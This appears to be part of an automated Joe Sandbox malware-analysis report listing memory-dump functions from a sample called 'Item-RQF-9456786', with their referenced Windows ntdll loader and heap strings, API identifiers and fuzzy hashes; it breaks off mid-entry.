                                                                                      • Part of subcall function 017E2DF0: LdrInitializeThunk.NTDLL ref: 017E2DFA
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017E0BA3
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017E0BB6
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017E0D60
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017E0D74
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 1404860816-0
                                                                                    • Opcode ID: f9463549ef92185ede80c7e1df5c0b32f7e8da2fde19c92428392fcfb1208496
                                                                                    • Instruction ID: 77b3c1892c847f0c2f12c6844d2774c1c80d72de7009a155def703c35c1fd953
                                                                                    • Opcode Fuzzy Hash: f9463549ef92185ede80c7e1df5c0b32f7e8da2fde19c92428392fcfb1208496
                                                                                    • Instruction Fuzzy Hash: FE426D72A00715DFDB21CF28C894BAAB7F9FF08314F1445A9E989DB245D770AA84CF60
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                    • API String ID: 0-379654539
                                                                                    • Opcode ID: 660de2818804d0e3a2fc607099bd89a6cff5c22638d1e4c8c5f6551bc2a501c5
                                                                                    • Instruction ID: 54aaf231e38e0a351435c35b25a278ac7f5225bba743e9fb5c22e4c504b0a20f
                                                                                    • Opcode Fuzzy Hash: 660de2818804d0e3a2fc607099bd89a6cff5c22638d1e4c8c5f6551bc2a501c5
                                                                                    • Instruction Fuzzy Hash: 5EC18970108386CFD722CF58C444B6ABBE4BF84704F448A6AF995CB291E774CA49CB56
                                                                                    Strings
                                                                                    • @, xrefs: 017D8591
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 017D8421
                                                                                    • LdrpInitializeProcess, xrefs: 017D8422
                                                                                    • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 017D855E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-1918872054
                                                                                    • Opcode ID: 4805b29094f017f8da28ad4f86105c0e526c04478e92e3d4ffd261c9fdbad546
                                                                                    • Instruction ID: 6ec6246460fb5a6fada40ab8b3c37fde6894f4bf332429c5d9b9a835b9bc28bb
                                                                                    • Opcode Fuzzy Hash: 4805b29094f017f8da28ad4f86105c0e526c04478e92e3d4ffd261c9fdbad546
                                                                                    • Instruction Fuzzy Hash: 59917D71508349AFDB22DF65CC44FABFAECBB88744F84092EF685D6155E370DA048B62
                                                                                    Strings
                                                                                    • .Local, xrefs: 017D28D8
                                                                                    • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 018121D9, 018122B1
                                                                                    • SXS: %s() passed the empty activation context, xrefs: 018121DE
                                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 018122B6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                    • API String ID: 0-1239276146
                                                                                    • Opcode ID: 91c28e2e759cda5b569ba2a1f752b4a323173bd178abedf8e0d12165edb6ee21
                                                                                    • Instruction ID: 4f97195c9fc8651cebf8d861fe21d884024ee1c5286d67f284f5674370681cf4
                                                                                    • Opcode Fuzzy Hash: 91c28e2e759cda5b569ba2a1f752b4a323173bd178abedf8e0d12165edb6ee21
                                                                                    • Instruction Fuzzy Hash: E6A1C03194122DDFDB25CF68C888BA9F7B5BF58314F2401E9D908AB256D7309E81CF90
                                                                                    Strings
                                                                                    • RtlDeactivateActivationContext, xrefs: 01813425, 01813432, 01813451
                                                                                    • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0181342A
                                                                                    • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01813437
                                                                                    • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01813456
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                    • API String ID: 0-1245972979
                                                                                    • Opcode ID: 44fe8e271359f3b9e23f213a9400fa490d375886f7bdef555ccbd332825eb700
                                                                                    • Instruction ID: f827aaa253511f07f5cc9b38aaee6bba9dc7ff6af19dcea924307b7d8ac94e08
                                                                                    • Opcode Fuzzy Hash: 44fe8e271359f3b9e23f213a9400fa490d375886f7bdef555ccbd332825eb700
                                                                                    • Instruction Fuzzy Hash: 176124726807169BD722CF1CC881B2AF7F5BFA4B20F148519E95ADB644D730E941CB91
                                                                                    Strings
                                                                                    • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 018010AE
                                                                                    • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01800FE5
                                                                                    • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01801028
                                                                                    • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0180106B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                    • API String ID: 0-1468400865
                                                                                    • Opcode ID: 42431324ea6695420e2989135e2151e483dcb75beaba0c8c0168d8be2ec0a473
                                                                                    • Instruction ID: 7c2dfa66eff94d1b5470e780fa78d6fbd5856dd6ffbe67510d604925c53b3877
                                                                                    • Opcode Fuzzy Hash: 42431324ea6695420e2989135e2151e483dcb75beaba0c8c0168d8be2ec0a473
                                                                                    • Instruction Fuzzy Hash: C271C3B19043059FCB21DF14C888B97BFE8EF95764F540569F9888B28AD734D688CBD2
                                                                                    Strings
                                                                                    • Querying the active activation context failed with status 0x%08lx, xrefs: 0181365C
                                                                                    • minkernel\ntdll\ldrsnap.c, xrefs: 01813640, 0181366C
                                                                                    • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0181362F
                                                                                    • LdrpFindDllActivationContext, xrefs: 01813636, 01813662
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                    • API String ID: 0-3779518884
                                                                                    • Opcode ID: a2652d2a3bbc170503efcf01b795ac2f85be5e61c61647dc47a122844ff54ab4
                                                                                    • Instruction ID: 4c5f75e577fc296de136967646942100d579784ade0f4558efdc29d503537444
                                                                                    • Opcode Fuzzy Hash: a2652d2a3bbc170503efcf01b795ac2f85be5e61c61647dc47a122844ff54ab4
                                                                                    • Instruction Fuzzy Hash: C7312C72A00219ABDF32AB0CCC49B75F6B4BB01754F0A416AEB4B97A51D7B09DC087D5
                                                                                    Strings
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 0180A9A2
                                                                                    • LdrpDynamicShimModule, xrefs: 0180A998
                                                                                    • apphelp.dll, xrefs: 017C2462
                                                                                    • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0180A992
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-176724104
                                                                                    • Opcode ID: 1836759d7ec87bebdc92d93b1b5ce7f0560309a7fb7cef96cb8869f257802dd9
                                                                                    • Instruction ID: 65cee056b2066928d82769b987613b0d3d33d695c8ffef7258e9a05a6f5d972e
                                                                                    • Opcode Fuzzy Hash: 1836759d7ec87bebdc92d93b1b5ce7f0560309a7fb7cef96cb8869f257802dd9
                                                                                    • Instruction Fuzzy Hash: 0B312772700305ABDB369F6D9D85A7AB7B5FB80B04F29005DE910EB299D7705B82CB80
                                                                                    Strings
                                                                                    • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 017B327D
                                                                                    • HEAP[%wZ]: , xrefs: 017B3255
                                                                                    • HEAP: , xrefs: 017B3264
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                    • API String ID: 0-617086771
                                                                                    • Opcode ID: 16dc682f4d2ee67e52a6bb5a24a578ca7dd555d83f7b3c3cbc0e359aba17dc6d
                                                                                    • Instruction ID: 114ac5d1014d6d2fd51be5f960bc4d271419f2ce705a0e88e9c81ced2bce6c37
                                                                                    • Opcode Fuzzy Hash: 16dc682f4d2ee67e52a6bb5a24a578ca7dd555d83f7b3c3cbc0e359aba17dc6d
                                                                                    • Instruction Fuzzy Hash: F1929971A056499FEB25CF68C484BEEFBF1FF48304F188099E859AB352D734A985CB50
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                    • API String ID: 0-4253913091
                                                                                    • Opcode ID: 24d50d3dfe758391640b4acea3a71b3aa78b3169d22b228498c02cb757a019be
                                                                                    • Instruction ID: 3f3996ded880afc01c262e04e5cee863ba4d9cb064f5ea5ec26da780ab3128a9
                                                                                    • Opcode Fuzzy Hash: 24d50d3dfe758391640b4acea3a71b3aa78b3169d22b228498c02cb757a019be
                                                                                    • Instruction Fuzzy Hash: 04F17B7060060ADFEB26CF68C894BAAF7B5FF44304F1441A9E516DB391D734AA81CFA1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $@
                                                                                    • API String ID: 0-1077428164
                                                                                    • Opcode ID: 70c9501eb635ed5d2eef33731bf65b3c56e701169e99d3c1a26974bcb5fa1e09
                                                                                    • Instruction ID: db0707ec75cb0474648c57400a13013647d83ae859605bd890c0634074a79e99
                                                                                    • Opcode Fuzzy Hash: 70c9501eb635ed5d2eef33731bf65b3c56e701169e99d3c1a26974bcb5fa1e09
                                                                                    • Instruction Fuzzy Hash: E6C290716083459FE769CF28C881BABFBE5AF88B14F04896DF989C7241DB34D944CB52
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: FilterFullPath$UseFilter$\??\
                                                                                    • API String ID: 0-2779062949
                                                                                    • Opcode ID: 97e4e7e7379262eeb8cff11c63078b1cb7e05f461d1ac563fd52151afba5f523
                                                                                    • Instruction ID: 7d9f31a89f7b89aeaaaf4388369b03823759dc53d1df58ea0e69746753f3fa86
                                                                                    • Opcode Fuzzy Hash: 97e4e7e7379262eeb8cff11c63078b1cb7e05f461d1ac563fd52151afba5f523
                                                                                    • Instruction Fuzzy Hash: 57A14A759116299BDF329B68CC88BAAF7B8EF48710F1001E9EA09A7251D7359E84CF50
                                                                                    Strings
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 0180A121
                                                                                    • Failed to allocated memory for shimmed module list, xrefs: 0180A10F
                                                                                    • LdrpCheckModule, xrefs: 0180A117
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-161242083
                                                                                    • Opcode ID: b54eb3421b3a0df75b2ec7ed461942374df49d9a9a0e005fd34bd210693f3fdc
                                                                                    • Instruction ID: c0f141cecd5a7ec74cc0d1f0bc4d602f08999daa9e16230af325f2f954067b4d
                                                                                    • Opcode Fuzzy Hash: b54eb3421b3a0df75b2ec7ed461942374df49d9a9a0e005fd34bd210693f3fdc
                                                                                    • Instruction Fuzzy Hash: 38719E75A00209DFDB2ADF68C985ABEF7F4FB44704F18406DE912EB255E734AA41CB90
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                    • API String ID: 0-1334570610
                                                                                    • Opcode ID: 44147ca5563ebd76c120552d636d8a613f08ba5623473f57d27964ec0595ac6d
                                                                                    • Instruction ID: e2e80ba0867003d9a3af703f4812f989f7b952425e9f15f0da59700d005ab3d6
                                                                                    • Opcode Fuzzy Hash: 44147ca5563ebd76c120552d636d8a613f08ba5623473f57d27964ec0595ac6d
                                                                                    • Instruction Fuzzy Hash: F361AB716003059FDB29CF28C884BABFBB1FF45704F15859AE449CB292D770E981CB91
                                                                                    Strings
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 018182E8
                                                                                    • LdrpInitializePerUserWindowsDirectory, xrefs: 018182DE
                                                                                    • Failed to reallocate the system dirs string !, xrefs: 018182D7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-1783798831
                                                                                    • Opcode ID: 05a14882493560adde4f671eb49abee18977e27c928243928f52b98de96ceeb6
                                                                                    • Instruction ID: b87413ee3b8bd93655c1830a29b9edae4c492469d0ea60f01504acc292a04135
                                                                                    • Opcode Fuzzy Hash: 05a14882493560adde4f671eb49abee18977e27c928243928f52b98de96ceeb6
                                                                                    • Instruction Fuzzy Hash: C94125B2541305ABC722EB68DC89B5BB7F8AF48720F19092EF955C3258E770D900CBD1
                                                                                    Strings
                                                                                    • @, xrefs: 0185C1F1
                                                                                    • PreferredUILanguages, xrefs: 0185C212
                                                                                    • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0185C1C5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                    • API String ID: 0-2968386058
                                                                                    • Opcode ID: db87d6dc4b53afac7f0f10706b11c36a9011abb110334b19768aaaa78fc24431
                                                                                    • Instruction ID: fdef3bdb83965e3a5db392fe3fdfcf626b9385d07723b3fe6b77b9f90721a755
                                                                                    • Opcode Fuzzy Hash: db87d6dc4b53afac7f0f10706b11c36a9011abb110334b19768aaaa78fc24431
                                                                                    • Instruction Fuzzy Hash: 3D414F75A00209ABDF51DAD8C895BEEFBBCEB14744F14406AEA09F7284D7749A448F90
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                    • API String ID: 0-1373925480
                                                                                    • Opcode ID: f8439bf11a5c253ec0a045d0612daf6b6c660ee3593e2f4b51cb0ce2d2d11fa4
                                                                                    • Instruction ID: 6b6053061c039eec3f4e128d070b8199b29d6c8a53a199562ea4480c5d809fb3
                                                                                    • Opcode Fuzzy Hash: f8439bf11a5c253ec0a045d0612daf6b6c660ee3593e2f4b51cb0ce2d2d11fa4
                                                                                    • Instruction Fuzzy Hash: 3F412631A00A58CBEB26DFD8C844BADBBB8FF95344F180459D901FB791D7748A41CB90
                                                                                    Strings
                                                                                    • LdrpCheckRedirection, xrefs: 0182488F
                                                                                    • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01824888
                                                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 01824899
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                    • API String ID: 0-3154609507
                                                                                    • Opcode ID: 7b0d25a13636c6a366fb5e92bba212097d218741eab4ed04ccaf9d47da370144
                                                                                    • Instruction ID: 41d53f930765fbe951db4198f86b73259493aed621d9725720733f8b19d922f6
                                                                                    • Opcode Fuzzy Hash: 7b0d25a13636c6a366fb5e92bba212097d218741eab4ed04ccaf9d47da370144
                                                                                    • Instruction Fuzzy Hash: C441D072A102759FCB23CE6CD840A26BBE4BF49B50F060269ED58D7311D770DA80CBA1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                    • API String ID: 0-2558761708
                                                                                    • Opcode ID: 97fdcd5c099f568493abfc82be72c135dfc62a2a8753803b533ebe45edf54e5a
                                                                                    • Instruction ID: 3c763fe673eaabd453c88562c3eda205688897da9d3ffc08dcdd715f5078d7bd
                                                                                    • Opcode Fuzzy Hash: 97fdcd5c099f568493abfc82be72c135dfc62a2a8753803b533ebe45edf54e5a
                                                                                    • Instruction Fuzzy Hash: C711DE7131450ACFDB6ACB18D8D4BABF3A4AF40B15F198159F006CB291DB30D940CB61
                                                                                    Strings
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 01822104
                                                                                    • Process initialization failed with status 0x%08lx, xrefs: 018220F3
                                                                                    • LdrpInitializationFailure, xrefs: 018220FA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-2986994758
                                                                                    • Opcode ID: 3e8caad0a20bef838692cd77537274fe8f954214c7c8820bcd4b9a92cede8d01
                                                                                    • Instruction ID: aa50c96267b2bac563a35ee17b113a3db54e1352fa5120a166370d33eba1a873
                                                                                    • Opcode Fuzzy Hash: 3e8caad0a20bef838692cd77537274fe8f954214c7c8820bcd4b9a92cede8d01
                                                                                    • Instruction Fuzzy Hash: 60F0F675680718BBEB25EB4CCC56F9977ADFB40B54F240069FA00F7285D6B0AB40CA91
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___swprintf_l
                                                                                    • String ID: #%u
                                                                                    • API String ID: 48624451-232158463
                                                                                    • Opcode ID: af856dd45e3858842d580cb129d1ec4d79de784fbcb72a2c67a249d12ecbc852
                                                                                    • Instruction ID: 8bdd5adc75cc3361716b9acef270047f066b38caef303b9d393b109b3891506f
                                                                                    • Opcode Fuzzy Hash: af856dd45e3858842d580cb129d1ec4d79de784fbcb72a2c67a249d12ecbc852
                                                                                    • Instruction Fuzzy Hash: B5712C71A0014A9FDB12DFA8C994FAEB7F8BF18704F144065EA05E7255EB38EE41CB61
                                                                                    Strings
                                                                                    • LdrResSearchResource Exit, xrefs: 017AAA25
                                                                                    • LdrResSearchResource Enter, xrefs: 017AAA13
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                    • API String ID: 0-4066393604
                                                                                    • Opcode ID: e561ea46d94a95167e68c2cabc55a0b1a96a2a87c9e5414e44ba4be6cad99673
                                                                                    • Instruction ID: 8e0c5c59ec8719c7be617b8fc3eaa9466676a8af4b95157da276ee48e9baad7a
                                                                                    • Opcode Fuzzy Hash: e561ea46d94a95167e68c2cabc55a0b1a96a2a87c9e5414e44ba4be6cad99673
                                                                                    • Instruction Fuzzy Hash: 12E19471E00219DFEB22CF99CD94BAEFBBABF98350F500569E901E7291D7749A40CB50
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: `$`
                                                                                    • API String ID: 0-197956300
                                                                                    • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                    • Instruction ID: 938ade231ab903273e5c5ada9832a35f0349b64c84c53a83b7445840692d7f5c
                                                                                    • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                    • Instruction Fuzzy Hash: DAC1F4312043469BE729CF28C845B6BBBE9BFC4318F084A2CF696DB291D775DA05CB51
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID: Legacy$UEFI
                                                                                    • API String ID: 2994545307-634100481
                                                                                    • Opcode ID: 81831ca1a5822f4b9ab8b349a174a10d0213d700c9ab883cd56713c01c84fb4b
                                                                                    • Instruction ID: cd5b13cd146aec8802ab59db9cd1e2b5a905611da4bc6a218c1f4915006d26fb
                                                                                    • Opcode Fuzzy Hash: 81831ca1a5822f4b9ab8b349a174a10d0213d700c9ab883cd56713c01c84fb4b
                                                                                    • Instruction Fuzzy Hash: 00616072E003099FEB15DFA8C844BAEBBF9FB48704F14446DEA59EB255D731AA40CB50
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$MUI
                                                                                    • API String ID: 0-17815947
                                                                                    • Opcode ID: 31972d8d4cfc29f41193b0065d3c17de1916a6694a44d75512a94ba90a0db813
                                                                                    • Instruction ID: fc34e15d1f17c03acce5b161a2afc7cf080d5e6bf77ebceb4df8b4ca8af2d50e
                                                                                    • Opcode Fuzzy Hash: 31972d8d4cfc29f41193b0065d3c17de1916a6694a44d75512a94ba90a0db813
                                                                                    • Instruction Fuzzy Hash: 3D512871E0021DAFDF11DFA9CC84BEEBBBDAB48754F100529E615F7291DA709A05CBA0
                                                                                    Strings
                                                                                    • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 017A063D
                                                                                    • kLsE, xrefs: 017A0540
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                    • API String ID: 0-2547482624
                                                                                    • Opcode ID: 917546f4b31fc088232d7f305954283a8be56573576591b95c124f2b2df73c8e
